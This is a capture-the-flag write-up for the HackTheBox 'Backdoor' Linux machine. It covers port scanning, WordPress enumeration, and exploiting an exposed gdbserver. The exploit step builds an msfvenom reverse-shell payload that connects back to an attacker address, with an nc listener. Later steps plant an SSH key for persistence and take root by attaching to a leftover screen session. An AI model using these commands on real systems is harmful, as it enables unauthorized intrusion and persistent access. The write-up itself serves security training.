Summary
Technical writeup for Backdoor linux machine on HackTheBox. The access to user account was obtained by an exposed GNU GDB server. Privilege escalation was possible due to a left and misconfigured background console session on high-privilege account.
Reconnaissance
Basic scans
First nmap scans were performed for full TCP port range and top 200 UDP ports:
nmap -v -T4 -Pn -A -oA nmap_full_tcp -p 1-65535 10.10.11.125
nmap -v -T4 -Pn -sU --top-ports 200 10.10.11.125
The output revealed 3 TCP services listening on the target host:
Host is up (0.076s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_https-redirect: ERROR: Script execution failed (use -d to debug)
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service identification
22/tcp
Port 22/tcp was obiously an OpenSSH service, that may enable the attacker to access the machine after sufficient credentials will be obtained from the server or added to user’s authorized_keys file. At this point nothing could be done with this service.
80/tcp
Port 80/tcp was an Apache 2.4.41 web server, that contained a Wordpress instance in version 5.8.1. For the beginning wp-scan tool was used to see if there are any obvious vulnerabilities within this instance:
wpscan --url http://10.10.11.125
Yet the scan output did not indicate any relevant results:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sat Mar 26 21:40:01 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |=======================================================================|
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Mar 26 21:40:09 2022
[+] Requests Done: 150
[+] Cached Requests: 36
[+] Data Sent: 37.157 KB
[+] Data Received: 17.975 MB
[+] Memory used: 238.348 MB
[+] Elapsed time: 00:00:07
1337/tcp
The last service was running under 1337/tcp but nmap did not recognize it properly. Attempt to run amap did not reveal any results as well:
amap -bqv 10.10.11.125 1337
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers
amap v5.4 (www.thc.org/thc-amap) started at 2023-01-22 21:30:16 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
After looking for exploits related to this port in search browsers, the following exploit could be found: GNU gdbserver 9.2 - Remote Command Execution (RCE)
User access
To use the exploit discovered for 1337/tcp it was required to generate a reverse shell payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=1234 PrependFork=true -o rev.bin
That command generated a reverse TCP shell shellcode for x64 architecture, that was supposed to connect back to 10.10.16.5 on port 1234, so that a corresponding listener must have been set on attacker’s machine:
nc -nlvp 1234
Having both payload and revese shell listener in place, the exploit could be ran:
python3 ./50539.py 10.10.11.125:1337 rev.bin
This exploit gave reverse shell with user rights and a user.txt flag.
Privilege escalation
Once a reverse shell was obtained, a new ssh key could be added with this one-liner:
mkdir -p ~/.ssh && echo "ssh-rsa YOUR_SSH_PUB_KEY" >> ~/.ssh/authorized_keys && chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys
so that it was more convinient to connect to the server with ssh service.
During enunmeration the following 2 processes appeared interesting:
root 962 0.0 0.1 6952 2308 ? Ss 20:37 0:00 SCREEN -dmS root
root 963 0.0 0.2 8272 5108 pts/0 Ss+ 20:37 0:00 _ -/bin/bash
This was a screen command running with -dmS root atributes and having /bin/bash process inside. After analysing screen syntax it was clear that the options -dm will allow to reattach to this session. The process was running on root user, so it was possible to attach to it with the following command:
screen -x root/root
and obtain root access to the machine.